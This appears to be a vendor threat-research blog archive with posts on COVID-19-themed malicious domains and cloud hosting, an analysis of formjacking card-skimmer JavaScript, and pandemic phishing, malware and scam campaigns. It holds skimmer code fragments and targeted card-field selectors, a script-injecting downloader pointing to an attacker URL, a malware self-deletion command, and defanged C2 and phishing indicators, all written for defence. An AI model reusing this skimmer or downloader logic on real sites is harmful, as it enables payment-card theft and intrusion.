Threats originating from the cloud can be more difficult to defend because malicious actors leverage the cloud resources to evade detection and amplify the attack. Organizations need to have a cloud-native security platform and a more advanced application-aware firewall to secure their environments. Palo Alto Networks continuously monitor the malicious newly observed hostnames. Prisma Cloud and VM-Series both provide layer-7 firewall capabilities in cloud environments to prevent malicious activities from these domain names.

Covid-19 Cloud Threat map
Figure 1. 86,600+ high-risk or malicious domain names related to COVID-19 were observed in seven weeks.

COVID-19 Themed Domain Names

The COVID-19 related domain names studied in this research were obtained from the RiskIQ dataset. The dataset keeps track of the newly observed domain names that contain keywords related to COVID-19, including “coronav”, “covid”, “ncov”, “pandemic”, “vaccine,” and “virus.” Between March 9th to April 19th, 1.2M domain names were observed with one of these keywords. 86,607 domain names are categorized as high-risk or malicious by Palo Alto Networks URL Filtering. A site is classified as malicious if command and control (C2), malware distribution, or phishing are observed. A site is classified as high-risk if it was previously confirmed to be malicious, hosted on bulletproof ISPs, or shares domains with other malicious sites. We enriched the dataset using the Palo Alto Networks URL Filtering, AutoFocus, WHOIS database, and IP geolocation. Note that due to the size of the dataset, we were unable to individually verify the relationship between each domain name and the COVID-19 pandemic.

Figure 2 describes the number of NOHs containing each keyword and the number of these NOHs observed every week. Figure 3 illustrates the types of malicious domain names identified in the dataset. On average, 1,767 high-risk or malicious COVID-19 related domain names are created every day. Figure 1 visualizes where the malicious domain names are hosted. The United States has the highest number of high-risk or malicious domain names (29,007), followed by Italy (2,877), Germany (2,564), and Russia (2,456).

Figure 2. Newly observed hostnames containing COVID-19 related keywords from March 9, 2020 to April 26, 2020.

Chart
Figure 3. Three types of malicious activity identified by Palo Alto Network URL Filtering

COVID-19 NRDs in Public Clouds

When focusing on the cloud-hosted domain names, 56,212 of the NOHs are hosted in one of the top 4 cloud service providers, AWS, Azure, GCP, or Alibaba. 39,494 (70%) of these domain names are hosted in AWS and only 61 (0.1%) of the domain names are hosted in Alibaba. Palo Alto Networks identified 2,829 cloud-hosted NOHs classified as “high-risk” or “malicious.” Figure 4 shows the distribution of NOHs across the 4 CSPs. The left plot is the distribution of all cloud-hosted NOHs, and the right plot is the distribution of “malicious” NOHs in public clouds. Note that Alibaba does not appear in the plot due to its low percentage (< 0.5%). It is interesting to see that only 5% of the NOHs are found high-risk or malicious in public clouds, while 7.5% of NOHs are found high-risk or malicious in the entire internet. We speculate that the higher price and more rigorous screening/monitoring process may make malicious actors less willing to host malicious domain names in public clouds. Note that researchers did not investigate why a large volume of NOHs were hosted on AWS as compared to other prominent CSPs. Nothing discovered during the analysis indicated fundamental vulnerability.

Figure 4. Distribution of NOHs in public clouds.

During the analysis on cloud-hosted malicious domains, we noticed that multiple domains may resolve to a single IP, and a single domain may be associated with multiple IPs. The first scenario often occurs when the domains are hosted in a CDN, such as Amazon Cloudfront or Cloudflare. In a CDN, hundreds or thousands of domains in the nearby geographical location may resolve to the same IP of an edge server. CDNs reduce network latency and improve service availability by caching the static web content on edge servers. However, because a malicious domain shares the same IPs as other benign domains in the same CDN, it also acts as a cover for malicious domains. In our analysis, a Cloudflare IP 23.227.38[.]64 is associated with more than 150 risky or malicious domains. E.g., covid-safe[.]shop, cubrebocascovid[.]com, www.covidkaukes[.]lt, protection-contre-le-coronavirus[.]com. In the same dataset, more than 2,000 other benign domains also resolve to the same IP.

In the second scenario, when a single domain name resolves to multiple IPs, the domain name may have a set of redundant hosts all serving the same content, or the domain name may again be hosted in a CDN. If a domain name has multiple redundant hosts, a DNS will hold multiple A records for this domain name. If a domain name is hosted in a CDN, the domain name can resolve to different IP addresses based on the client's location. The IP of the closest edge server is always returned when a client queries DNS servers for this domain name. In our analysis, the domain name covid19-fr.johanrin[.]com resolves to 28 different IPs where each IP belongs to an Amazon CloudFront edge server. E.g., 52.85.151[.]68, 99.84.191[.]82, 13.249.44[.]82, 54.192.30[.]118

This many-to-many domain name to IP mapping makes it difficult to block malicious domain names by IP addresses. A denylisted IP in a layer-3 firewall may fail to block the traffic to/from a malicious domain while unintentionally making many other benign domain names unreachable. A more intelligent layer-7 firewall is necessary to inspect the domain names in the application layer and selectively pass or block sessions.

Conclusion

Cyber threats are evolving rapidly and leveraging real-world events to deceive victims. With COVID-19 driving a surge in cloud adoption, we see not only attacks targeting the cloud users but also threats originating from the cloud. With thousands of malicious domains coming online every day, it is imperative to protect every endpoint with continuous monitoring and automatic threat prevention tools because cloud-hosted applications and services are exposed to the same threats as non-cloud endpoints. The problem becomes even more complicated when working in a multi-cloud environment. Due to the complexity of cloud management, user-induced misconfigurations lead to the most security incidents. Cloud Native Security Platforms (CNSPs) help organizations monitor and secure resources across multiple cloud providers, workloads and hybrid cloud environments.

Palo Alto Networks customers are already protected from these threats by:

 

Anatomy of Formjacking Attacks

Posted on by Jin Chen

Executive Summary

The rise of the Internet has contributed positively in many ways to people's lives and you can find almost any service on the internet now. However, the convenience of the internet also opens a gate to use malware to steal people's confidential information, and unfortunately, more and more malware authors are taking advantage of this.

Formjacking, where cybercriminals inject malicious JavaScript code to hack a website and take over the functionality of the site's form page to collect sensitive user information, is one of the fastest growing forms of cyber attack. It is designed to steal credit card details and other personal information from payment forms that are captured on the “checkout” pages of e-commerce websites.

When a user unknowingly visits a compromised shopping website which has been hacked, they put items in their cart and go to checkout, inputting their credit card information (e.g. Name, address, email, credit card number, CVV, expiration date, etc.) on the checkout page. When they click the "checkout" or "submit" button, a malicious code collects the users' input information and sends it to an attacker’s Command & Control (C2) server. The original purchase request is unaffected by this and the user receives their products as expected. Many large websites have been compromised using this technique, such as British Airways, Ticketmaster, Delta, Newegg and Topps.com Sports Collectibles.

The process flow is in Figure 1, below:

Formjacking flow
Figure 1. Formjacking process flow

Writing formjacking code and deploying it to a compromised site is not very difficult for an attacker to do and allows them to steal credit card information quickly and easily without needing to deploy malware or compromise a system.

This makes it very attractive for attackers, especially considering e-commerce service is very popular today.

This blog provides a deep-dive into how formjacking code works. Palo Alto Networks customers are protected from this type of attack: WildFire detects and correctly identifies formjacking attacks as malicious and PANDB also identifies the URLs as malicious.

Typical Formjacking Attack

Below is a typical formjacking sample, which as of April 8, 2020 was only detected as malicious by three entities in VirusTotal. (SHA256:a79da1f007cfc88e4f8ae13623e2b752d2da03bcf9d51a74ea1fca2e6e6fca14)

The code is very long and highly obfuscated; we had to deobfuscate it before we were able to read it. Below is part of the original code.

At first, we can see the basic construct is:

Taking var1 as an example, we break it down into three parts:

  • ["W*![EnTa/mKelU*R=R'3/ngu8mpe/rqxo7N_EcglaDrvtla5qoK'!]" is the first part and is an encrypted string.
  • [(785034646 * "kNL7xIvgS.\x85j}_K=" ["charCodeAt"](2) + 22.0)["toString"](("Y^8ZH/D:0$or5<+\x8aqU" ["charCodeAt"](3) * 0 +36.0))] is the second part.
    1. We can calculate (785034646 * "kNL7xIvgS.\x85j}_K=" ["charCodeAt"](2) + 22.0) to get 59662633118.
    2. We can also calculate ("Y^8ZH/D:0$or5<+\x8aqU" ["charCodeAt"](3) * 0 +36.0)) to get 36.
    3. So the second part is the same as (59662633118).toString(36), which means the result is "replace" string, refer to toString function documentation.
  • (/[\!8ET\/WNl5vRDpgUqKx37]/g, "") is the third part, which is a regex pattern.

Since var1 is the same as "xxxxx".replace(/[\!8ET\/WNl5vRDpgUqKx37]/g, ""), that means it uses the regex to decrypt the string. After decryption, var1 is "*[name*='numero_cartao']".

Finally we can deobfuscate the above code to below:

Below is another part of the original code.

We can deobfuscate the above to get the below code:

Now, let’s deobfuscate the original core code, shown below.

Now we can figure out the main flow of events:

  1. It creates a listener on the "DOMContentLoaded" and "load" events, so once a page finishes loading, it will execute the sHv function, which creates a timer to execute the yFj function every 7 seconds.
  2. The yFj function will scan all payment-related buttons in the page using ("button[onclick*='.save']" and "button[class*='checkout']"). If one exists, it will create "click" and "mousedown" listeners with the event function zTI.
  3. When a user clicks a related button, the zTI function is triggered and it will collect any values from below the html element by document.querySelector (see the pa4 function), and these values include credit card information:
    • window["payment_checkout1"] = ["*[name*='numero_cartao']", "input[id*='cc_number']", "*[name*='cc_num']"]
    • window["payment_checkout2"] = ["*[name*='expiracao_mes']", "*[name*='cc_exp_m']", "*[name*='expirationMonth']"]
    • window["payment_checkout3"] = ["*[name*='expiracao_ano']", "*[name*='cc_exp_y']", "*[name*='expirationYear']"]
    • window["payment_checkout4"] = ["*[name*='codigo_seguranca']", "input[id*='cc_cid']", "*[name*='cc_cid']"]
  • Then it will call the hZy and F8S functions to encrypt the collected data.
  • At last, it will call the wIW function to send the data to the remote server.

The main process flow is shown below in Figure 2.

Formjacking code flow
Figure 2. Formjacking code flow

Simply to say, it will listen to the “click” event, once you click, it will collect all payment information which you fill in form, and send it to the C2 server.

An Advanced Example

An advanced Formjacking sample can hide itself more craftily, which makes it very hard to be tracked. We use the below SHA256 for this analysis.

(SHA256: 5775efac071288ff6632056635f285b03bf2ab6d6dee1fd902555e256fe63119)

At a glance, it is not hard to read, the code is only a few lines.

 

The above 4 steps:

  1. Create a PFG variable, which is a string constructor function.
  2. Use a loop to decrypt the stage 2 code and assign it to the qKn variable.
  3. Overwrite the hAn.toString function with the PFG.constructor(qKn).constructor.
  4. Execute the hAn.toString() function so it will execute "xxx".constructor(qKn).constructor(), which will execute qKn as code. In step 2, qKn was assigned as the stage 2 code.

Next we analyzed the stage two code, hash shown below.

(SHA256:1e4300dff5e0978092102028487c08267b74fb3beef14faa56b0f1a3fbc53ae4)

It uses a "regex" to obfuscate the code, which we mentioned before. After deobfuscation, we can figure out it is only a downloader as it only:

  1. Creates a DOM element: cdn=document.createElement("script")
  2. Sets the element source url to: cdn.src="hxxps://xxxxxx[.]com/js/content.js";
  3. Appends this element to the DOM tree.

So it would download stage 3 code from hxxps://myxintad[.]com/js/content.js, but the URL is no longer accessible. While we can not get its content, our previous analysis shows attackers can use powerful JavaScript to do lots of things:

    • Obfuscate and encrypt code.
    • Only put a downloader in a target website, and put the real malicious code in their own remote server. This allows attackers to change its content easily and decide when it is accessible.
    • Create multi-stage malware to make it more difficult to track, as in this case with stages 1 through 3…it can greatly frustrate researchers.

More Advanced Skills

Sometimes, malware authors will use some advanced skills to make code difficult to debug. We use the below hash for this example. It is similar to the one analyzed above, but it has extra anti-debug code, shown obfuscated below.

(SHA256:981d0c4d7e1d9249f3c0f59021f02c171233a5259ebda20a671e13d474fb74ec)

The deobfuscated code is:

The code uses two skills to make it hard to be analyzed:

  1. It checks if you are using Firebug debugger to debug code.
  2. It uses a JavaScript conditional operator to execute different branch code for different detection results. Sometimes malware even uses cascading javascript conditional operators, like "condition1 ? aaa: (condition2? bbb: (condition3? ccc: ddd)))", that is very very hard to set a debug breakpoint.

Conclusion

JavaScript is not a new technology, it has been in use for more than 20 years, and is continuously updated. Today, most websites use Javascript, and we believe JavaScript attacks like formjacking are becoming a trend.

To mitigate risks, online retailers and e-commerce sites are advised to patch all of their systems, components, and web plugins to avoid being compromised. Additionally, it’s best practice to regularly conduct web content integrity checks offline to see if your pages were edited and had malicious JS code inserted by attackers. Lastly, make sure you’re using strong passwords on your content management system (CMS) administrators to make it less susceptible for brute force attacks.

For consumers shopping on these sites, we recommend paying via the one-time payment option that’s frequently offered (e.g. PayPal. Visa Secured, etc.) instead of your credit card whenever possible. If you believe your credit card information was stolen as a result of a recent online purchase, you should contact your bank to freeze or change your card immediately. Additionally, consider putting a freeze on your credit so that new accounts can’t be opened up using your personal information.

Palo Alto Networks customers are protected from this type of attack: WildFire detects and correctly identifies formjacking attacks as malicious and PANDB also identifies the URLs as malicious.

Acknowledgements

We would like to thank Kyle Wilhoit, Jen Miller Osborn and Mark Karayan for their advice and help with improving the blog.

IOCs

hxxps://www.cheshirehorse[.]com/

a79da1f007cfc88e4f8ae13623e2b752d2da03bcf9d51a74ea1fca2e6e6fca14

hxxp://92wear[.]vn/

5775efac071288ff6632056635f285b03bf2ab6d6dee1fd902555e256fe63119

1e4300dff5e0978092102028487c08267b74fb3beef14faa56b0f1a3fbc53ae4

hxxps://www.posterburner[.]com/SavedSession.aspx?SID=3Daba5c976c3f441ecbf449=

981d0c4d7e1d9249f3c0f59021f02c171233a5259ebda20a671e13d474fb74ec

 

Studying How Cybercriminals Prey on the COVID-19 Pandemic

Posted on by Janos Szurdi

Executive Summary

With the spread of the coronavirus worldwide, interest is high in related topics. Accordingly, Unit 42 researchers found an immense increase in coronavirus-related Google searches and URLs viewed since the beginning of February. Cybercriminals are looking to profit from such trending topics, disregarding ethical concerns, and in this particular case preying on the misfortunes of billions.

To protect customers of Palo Alto Networks, Unit 42 researchers monitor user interest in trending topics and newly registered domain names related to these topics, as miscreants often leverage them for malicious campaigns. Accompanying the growth in user interest, we observed a 656% increase in the average daily coronavirus-related domain name registrations from February to March. In this timeframe, we witness a 569% growth in malicious registrations, including malware and phishing; and a 788% growth in “high-risk” registrations, including scams, unauthorized coin mining, and domains that have evidence of association with malicious URLs within the domain or utilization of bulletproof hosting. As of the end of March, we identified 116,357 coronavirus-related newly registered domain names. Out of these, 2,022 are malicious and 40,261 are “high-risk”.

We analyzed these domains by clustering them based on their Whois information, DNS records and screenshots (collected by our automated crawlers) to detect registration campaigns. We found that while many domains are registered to be resold for a profit, a significant fraction of them are used for both well-known malicious activities as well as for fraudulent shops selling items in short supply. The traditional malice abusing coronavirus trends includes domains hosting malware, phishing sites, fraudulent sites, malvertising, cryptomining, and black hat Search Engine Optimization (SEO) for improving search rankings of unethical websites. Interestingly, although many webshops that use newly registered domains try to scam users, we detected an especially unethical cluster of domains capitalizing on users’ fear of coronavirus to further frighten them into buying their products. Moreover, we discovered a group of coronavirus-themed domains, which now serve parked pages with high-risk JavaScript that may at any time start redirecting users to malicious content.

In this blog, we first showcase the increasing trend of user interests in coronavirus-related topics on the Internet, with data from both Google Trends and our service traffic logs. Second, we illustrate the significant increase in domain registration activities recently for domain names containing coronavirus-related keywords. Third, we present a detailed case study on how cybercriminals are abusing and monetizing such user interests on the Internet. Finally, we conclude with a discussion of best practices.

Note that all the malicious websites and malware attacks mentioned in this blog have been covered ahead of time by various security service offerings of Palo Alto Networks, including URL Filtering, DNS Security, WildFire, and Threat Prevention.

Increase in User Interest of Coronavirus-related Topics

coronavirus related keywords
Figure 1. Trend of users searching coronavirus related keywords

Using Google Trends and our traffic logs, we observed a steep increase in user interest of topics related to coronavirus. In Figure 1, we can see how interested users are in coronavirus-related keywords based on Google Trends. In particular, we see three prominent peaks at the end of January, the end of February, and the middle of March 2020. The first peak aligns with the virus outbreak in China, the second peak signifies the first US case of unknown origin, and the third peak is at the same time as the virus outbreak in the US. One interesting exception in Figure 1 is alcohol, as users have an interest in it all year round, with a peak at Christmas. Intuitively, the year round interest in alcohol is for drinking it, however the peaks aligned with coronavirus are for medical alcohol.

coronavirus related URLs
Figure 2. Trend of users visiting coronavirus related URLs

Matching our observations about user interest from Google Trends, we see in Figure 2 a near ten-fold increase in the number of unique coronavirus-related URLs visited by our customers comparing early February to late March.

The increased user interest in coronavirus presents a lucrative opportunity for cybercriminals to profit from this pandemic. A common method for crooks to benefit from trending topics is to register domain names that include related keywords, such as “coronavirus” or “COVID”. These domain names often host legitimate-looking content and are used for a wide variety of malicious activities, including tricking users into downloading malicious files, phishing, scams, malvertisement and cryptocurrency mining.

To combat criminals employing coronavirus-related domain names, we obtain keywords from trending topics. First, we automatically extract keywords using the Google Trends API. Then we manually select the keywords most relevant to coronavirus. Finally, using our set of keywords, we closely monitor newly registered coronavirus-related domain names.

The Rise of Coronavirus Domain Names

Unit 42 has been tracking newly registered domains (NRDs) for more than nine years and has previously published a comprehensive analysis of them. To study the emerging threats abusing COVID-19, we retrieved NRDs containing coronavirus-related keywords from January 1, 2020 to March 31, 2020. Our system detected 116,357 related NRDs during this period, with roughly 1,300 domains every day. Figure 3 presents the daily trend of new domain name registrations detected during our study period. We found an increase in the number of coronavirus domains over time, and after March 12, we detected over 3,000 new domains every day. Apart from the general trend of growth, we also observed sudden increases in the number of domains registered. These increases in registrations follow the peaks in user interest seen in Google Trends with a few days of delay.

Figure 3.Daily coronavirus-related domain registration trends

We used Palo Alto Networks’ threat intelligence, including our DNS Security service and URL Filtering service, to evaluate coronavirus-related NRDs. We classify NRDs into two categories. First, malicious NRDs include domains used for command and control (C2), malware distribution and phishing. Second, high-risk NRDs contain scam pages, pages with insufficient content, coin miners, and domains associated with known malicious or bulletproof hosting. While in this blog, we separate our categorization into malicious and high-risk, URL Filtering service provides our customers a more fine-grained categorization of domain names as described in this document.

During our analysis, we identified 2,022 malicious and 40,261 high-risk NRDs. The malicious rate is 1.74% and the high-risk rate is 34.60%. Among the malicious domains, 15.84% are involved in phishing attacks trying to steal users’ credentials, and 84.09% are hosting different kinds of malware, including Trojans and info stealers. Different from phishing and malware, we only found a couple of domains used for C2 communication.

Supporting our previous observations, the increase in the average daily number of coronavirus-related domains from February to March is 656%. We witness a similar trend of malicious and high-risk coronavirus domains, with 569% and 788% growth, respectively. In Figure 3, we can observe that malicious registrations follow NRD trends, in some cases even exceeding them.

Figure 4. Daily customer DNS query trends related to coronavirus

Additionally, we find that even though these domains were recently registered, we have observed - in total - 2,835,197 DNS queries (caching excluded) for these domains according to the Passive DNS data that we collect. Furthermore, an average malicious NRD is queried 88% more than an average non-malicious NRD, which aligns with attackers’ incentives to utilize their domains before they get blacklisted. Figure 4 shows the daily trends of DNS queries observed in our Passive DNS database using a seven-day moving average. We notice a steep increase on March 16 in the number of benign and malicious NRDs queried. This increase correlates to our previous observation of user interest and domain registrations peaking a few days before due to the virus outbreak in the US.

Coronavirus abused keywords in NRD
Figure 5. Most abused keywords in NRD

The keyword set we use for our analysis contains terms specific to the coronavirus pandemic like “coronavirus” and “COVID-19”. We also leverage more general ones such as “pandemic” and in addition to words directly related to the virus, we also include keywords related to supplies running out, such as “facemask” and “sanitizer”.

In Figure 5, we list the top 15 keywords which matched the most NRDs. In general, the specific terms are more favorable for registrants, and there are several registration campaigns for related supplies. Apart from the detection count, these popular keywords have risk levels above average (>40% high-risk rate), which means they’re more likely to be abused. On the other hand, their malicious rate is similar to average keywords. A special case is “virusnews” matching 344 NRDs, where 33% of them are malicious.

How Attackers Are Abusing the Coronavirus Pandemic

Observing the increase in malicious and high-risk coronavirus NRDs, we analyzed these domains further to understand how cybercriminals utilize them. We start by clustering domain names based on Whois information and DNS records, including registration date, registrar, registrant’s organization, Autonomous System Number (ASN) and name service provider. Additionally, we cluster domain names based on their main webpage’s visual similarity. We employ the k-nearest neighbor algorithm using the last layer of the DenseNet 201 model from the Keras library as features. Building on our clusters, we found several malicious or abusive registration campaigns, which we will discuss alongside with typical scenarios of malicious use cases.

Phishing User Credentials with Coronavirus Domains

The goal of phishing attacks is to trick users into sharing their credentials and personal information with the attackers. Among coronavirus domains, we observe classic phishing schemes where attackers send an email to our customers with a link to a fake website mimicking a legitimate brand’s or service’s website to fool users into giving away their login credentials.

Figure 6. Domain corona-masr21[.]com hosting a Bank of America phishing page
We detected a cluster of 20 domains registered on the same day following the corona-masr*.com pattern, where * is a number anywhere from 1 to 101. While there are 101 possible domain name variations in this range, only 20 were registered. In Figure 6, we see an example of a phishing URL hxxp[:]//corona-masr21[.]com/boa/bankofamerica/login.php targeting Bank of America. The goal of attackers is to persuade users that they need to login on this fake webpage and that the bank owns it. This cluster also includes phishing URLs imitating other services including http[:]//corona-masr21[.]com/apple-online targeting Apple’s login page and hxxps[:]//corona-masr3[.]com/CAZANOVA%20TRUE%20LOGIN%20SMART%202019/ targeting PayPal’s login pages. Another phishing campaign was targeting Outlook accounts from the corona-virusus[.]com and coronavirus-meds[.]com domains.

In addition, we found that those domains serving phishing pages also host zipped files with their malicious source artifacts. Those include HTML and PHP source codes of phishing “front-ends” (corona-masr4[.]com/test.zip), as well as codes to send out spam emails and filter out requests from benign web crawlers (corona-virusus[.]com/OwaOwaowa.zip). This is a common practice by malicious campaigns to host and distribute packed versions of malicious payloads, which can be downloaded by a dropper on another compromised website.

Figure 7. Bank of America’s legitimate website

Users can check three main indicators, shown in Figure 7, to ensure they are not the victim of a phishing attack. First, they need to make sure that the domain portion of the URL is the expected domain name owned by the service where they try to log in. Second, users need to make sure that there is a lock icon on the top-left side, signifying that they are connected via a valid HTTPS connection, therefore preventing man-in-the-middle (MiTM) attacks. Finally, users can verify if the domain name matches the owner of the certificate.

Coronavirus Domains Hosting Malicious Executables

Many newly-registered COVID-19 domains were identified as being associated with malware activity. One such domain, covid-19-gov[.]com, warrants special attention, as it is consistent with similar RedLine Stealer activity previously reported by Proofpoint.

Although the initial infection vector utilized to direct potential victims to the above site remains unclear, Unit 42 researchers identified a RedLine Stealer sample being hosted at the URL covid-19-gov[.]com within a ZIP file. When the contents of the ZIP file were extracted, the RedLine Stealer binary was revealed to have the filename Covid-Locator.exe.

When executed, the sample first opens Internet Explorer and attempts a connection to hxxp://localhost:14109. It then initiates an HTTP POST request to the URL hxxp://45.142.212[.]126:6677/IRemotePanel, which is consistent with RedLine Stealer check-in behaviors. After the check-in is made and the remote C2 server issues an HTTP 200 OK response, data exfiltration from the host begins:

Figure 8. Network traffic from RedLine Stealer data exfiltration

Of particular note is the use of the URL hxxp://tempuri[.]org/IRemotePanel/SendClientInfo in the SOAPAction HTTP header field. The domain tempuri[.]org is not directly related to the malicious activity, but is a standard default placeholder domain for web services in development. According to established web service implementation best practices, this field should be updated to reflect an appropriate namespace so that a given web service can be uniquely distinguished and identified. That said, this detail is occasionally overlooked by even legitimate web services, and thus tempuri[.]org should not be considered an IOC for the purposes of threat identification.

Other interesting host-based behaviors of this RedLine Stealer variant include the execution of this command in a hidden command prompt window:

cmd.exe" /C taskkill /F /PID <RedLine Stealer PID> && choice /C Y /N /D Y /T 3 & Del “”

Based on the contents of the command, it can be inferred that the intent of the malware author was to ensure that, when executed via cmd.exe, this command would kill the running instance of the RedLine Stealer malware via its process identifier (PID), initiate the deletion of the directory in which the RedLine Stealer malware was present, and attempt to answer the deletion prompt programmatically with a Y response. However, there are two problems with this approach. The first is that the concept does not appear to be sound to begin with. The use of the choice command for this use-case will not produce the desired result. Secondly, while the command in its current state does sufficiently kill the running instance of the malware and initiates a choice of Y (which is then automatically selected after three seconds have elapsed as per the /T switch of the command), it offers this choice before the file deletion prompt appears. Meaning that, even if choice could be used in this way, it still wouldn’t work.

Additionally, this RedLine Stealer variant does not appear to generate additional malicious files on disk, create/alter any mutexes, or attempt to establish host-based persistence.

In addition to RedLine Stealer, we also detected other examples of malware delivery using coronavirus domains. Another such example, hosted at corona-map-data[.]com/bin/regsrtjser346.exe, was identified as the Danabot banking Trojan.

We also identified several instances of coronavirus-themed malware intended to victimize mobile users. Specifically, we identified three malicious Android applications on the domain Corona-virusapps[.]com served from URLs matching the schema Corona-virusapps[.]com/s<1-3>/CoronaVirus-apps.apk.

We also identified two others at coronaviruscovid19-information[.]com/it/corona.apk, and coronaviruscovid19-information[.]com/en/corona.apk, respectively.

All aforementioned APKs were identified as generic Trojans.

While a full in-depth analysis of the Danabot sample and the various APKs is beyond the scope of this blog, we have included additional relevant details in the IOC section.

Coronavirus Domains for C2 Communication

C2 domains are used by malware to “phone home” for receiving commands as well as for data exfiltration. While cybercriminals are mainly using coronavirus-related domains for malware, phishing, and scams, we also observe cases where they are involved in C2 communication.

Figure 9. NATsupport network communication

The domain covidpreventandcure[.]com is used by a malicious NATSupportManager remote access tool (RAT) sample. From the network traffic shown in Figure 9, we see that the domain resolves to 5.181.156[.]14. Then it sends multiple POST requests to hxxp://5.181.156[.]14/fakeurl.htm as well as TCP packets to port 443. As shown in Figure 10, the POST communication is based on HTML forms that the C2 server attaches to the encoded command and payload in the HTTP response while the Trojan sends out the encoded stolen data.

Figure 10. HTML form communication

covidpreventandcure[.]com was registered on March 26. We started observing related DNS traffic two days later and it was active until April 11. There was a significant increase of DNS traffic resolving this domain in April, indicating a possible spike in related compromises. The Trojan also tried to resolve another unregistered COVID-19 covidwhereandhow[.]xyz, which is likely in preparation for future attacks.

Another COVID-19 domain observed in use by malware was coronavirusstatus.space. This domain was associated with an AzoRult downloader purporting to be a global COVID-19 tracking application.

Scam Webshops Advertising Short Supply Items

We identified several high-risk domain registrations, where miscreants create fake webshops and try to scam users into buying short supply items. There are many indicators of fraudulent webshops that users can use as clues to avoid becoming victims. For example, often these webshops advertise deals that are too good to be true in the current coronavirus pandemic, it means they offer high-demand items like face masks or hand sanitizers for a discounted price. If we additionally find that the webshop is new, then it is time to look for more clues. Additional example indicators include pressing users to purchase immediately or miss the deal, fake reviews, fake contact information, cut and pasted text on the webshops, grammatical errors, and keyword-stuffed pages.

Figure 11. allsurgicalfacemask[.]com scam website
A particular group registered two domains allsurgicalfacemask[.]com and surgicalfacemaskpharmacyonline[.]com. These sites advertise facemasks in high demand. The only differences between the two sites are the contact information used and the fake user testimonials.

When visiting these scam websites, our suspicion starts when they claim to have been operating since 1996, as illustrated in Figure 11. However, we find both domains are only one-month old, coinciding with the rise of the coronavirus pandemic. Next, we observe a mismatch in country and domain registration information. The domain names are registered in India, while one website has the address and phone number for France. The other site has an address in Germany, but the phone number is in the US.

Searching for the German address “Mohrenstrasse 37 10117 Berlin”, we find it is actually a government building for the Federal Ministry of Justice and Consumer Protection in Berlin. The French address “6 Rue Boreau, 49100 Angers, France” appears to be a personal residence.

Coronavirus scams site
Figure 12. allsurgicalfacemask[.]com fake testimonials
Furthermore, we find poorly written, simple, and most likely fake testimonials on both pages following the same style of writing as shown in Figure 12. A final clue is their preference to be contacted through WhatsApp number “+33 752 56 3071”, which is highly unusual for a well-established business operating since 1996.

Figure 13. selectsanitizer[.]com user reviews from before the domain was registered
Next, we find hard-to-get hand sanitizers offered on selectsanitizer[.]com for a discounted price, warranting further investigation. We encounter favorable user reviews about the sole item sold on this site. We discovered that some of the reviews, presented in Figure 13, date back to November 2019, while the domain was registered only in March 2020. Searching for the text of the newer reviews, we found that they were copied from other sites offering hand sanitizers, including an Amazon review. Finally, at checkout, the webshop alerted us that their stock is low, conveying a sense of urgency.

Card Skimmer Webshops

Figure 14. Example of a pandemic popular store with an embedded card skimmer

In addition to suspicious fraudulent stores on coronavirus-related domains, we detected web skimmer scripts on other stores which also sell pandemic-relevant goods. An example store www.sunrisepromos[.]com/promotional-personal-care-accessories/personalized-hand-sanitizer.html is shown in Figure 14.

These stores include credit card validation scripts with injected malicious code, which sends out your credit card information as soon as you finish typing it. An injected snippet is shown in Figure 15. Upon a page load, the script checks whether the page is a relevant checkout page by matching its URL against a list of regex, and starts periodic attempts to collect and send an entered credit card number every 150 ms. In particular, it calls function send, which first adds event listeners to form submit and button click events in order to collect entered inputs, and then it checks collected information against a regex for credit numbers before sending out to a potentially compromised path at /js/index.php. Given that such websites are developed with Magento framework, we suspect this to be a variation of Magecart skimmer implants. This activity is very similar to activity reported by Magento users on its customer forum in 2016.

Coronavirus scams credit card skimmer
Figure 15. Credit card skimmer code found on several websites selling pandemic-related goods

Feeding on Coronavirus Fears for Profit

coronavirus scam scaring users
Figure 16. survivecoronavirus[.]org scaring users into buying their survival book
Interestingly, we found a group of websites building on peoples’ already existing fears of coronavirus and trying to scare them further into buying their ebook as shown in Figure 16. First, they play a disturbing video about the scariest situations and events related to coronavirus, then they advertise the book as the key to survive this pandemic.

We found a cluster of eight domains registered to perpetrate this scam, including coronavirussecrets[.]com and pandemic-survival-coronavirus[.]com. When we attempted to buy their book, we landed on the site buygoods[.]com -- a site with mixed reviews from customers on San Diego Consumers’ Action Network's and on Better Business Bureau's websites. The article on San Diego Consumers’ Action Network's calls them info scammers, which they define as “selling misleading or false information to consumers at inflated prices using fraudulent tactics”. Additionally, many users report that they did not receive the item for which they paid.

Coronavirus Domains to Spread Classic Scams

Coronavirus scams example
Figure 17. Example of a technical support scam page on covid19center[.]online
Classic scam campaigns also take advantage of the popularity coronavirus domains have. For example, we detected a well-known technical support scam campaign served from coronavirusaware[.]xyz and covid19center[.]online, illustrated in Figure 17. For the past half a year, this scam campaign was seen on over 3,000 unique domains and IP addresses (using behavioral signatures described in this paper). The attackers aim to scare web users and make them call and eventually get them involved in scam communication.

Another example is the WhatsApp fake “free internet” scam campaign, which was previously seen using different WhatsApp-related domains (such as whatsapp[.]version[.]gratis and whatsapp[.]cc0[.]co), but now uses internet-covid19.xyz. Interestingly, this campaign is reusing the same Google Analytics ID across its domains - UA-108418953-1 (more on tracking campaigns via analytics IDs can be found in this paper).

Illicit Pharmacies

Coronavirus scams illicit pharmacy
Figure 18. anticovid19-pharmacy[.]com illicit pharmacy
Researchers have long studied illicit online pharmacies, and we found a cluster of three coronavirus domains hosting similar pharmacies, as shown in Figure 18, which are covid19-remedy[.]com, rxcovid[.]com and anticovid19-pharmacy[.]com. The same researchers have discussed that these pharmacies are unlicensed and leverage compromised websites to increase their placement in search results for keyword combinations such as “cheap viagra”. Even worse, these pharmacies might sell drugs with incorrect and potentially dangerous doses. While the domain names suggest that these stores sell remedies for coronavirus, they mainly advertise Viagra and other drugs unrelated to the virus.

Abuse of Coronavirus Trends for Black Hat SEO

The increased interest in a topic can be leveraged to attract traffic for websites. Black hat SEO describes a collection of techniques used to artificially make a website appear on top of search engine results for certain keywords.

Figure 19. coronavirus-latest-update[.]info which looks like a coronavirus informational page
We find a cluster of nine coronavirus-related domains used for black hat SEO. All of the domains host similar informational pages about coronavirus like coronavirus-latest-update[.]info shown in Figure 19. However, these websites are not actual informational pages. First, we can observe many links to sharkroulette[.]com, a Bitcoin-based online casino. Second, even if we try to click on a link that promises to redirect to coronavirus-com[.]info, we will still be redirected to sharkroulette[.]com due to JavaScript overlay on links.

Proactive Registrations of Suspicious Parked Pages

Figure 20. Example of a suspicious parked registration on coronavirus2day[.]com
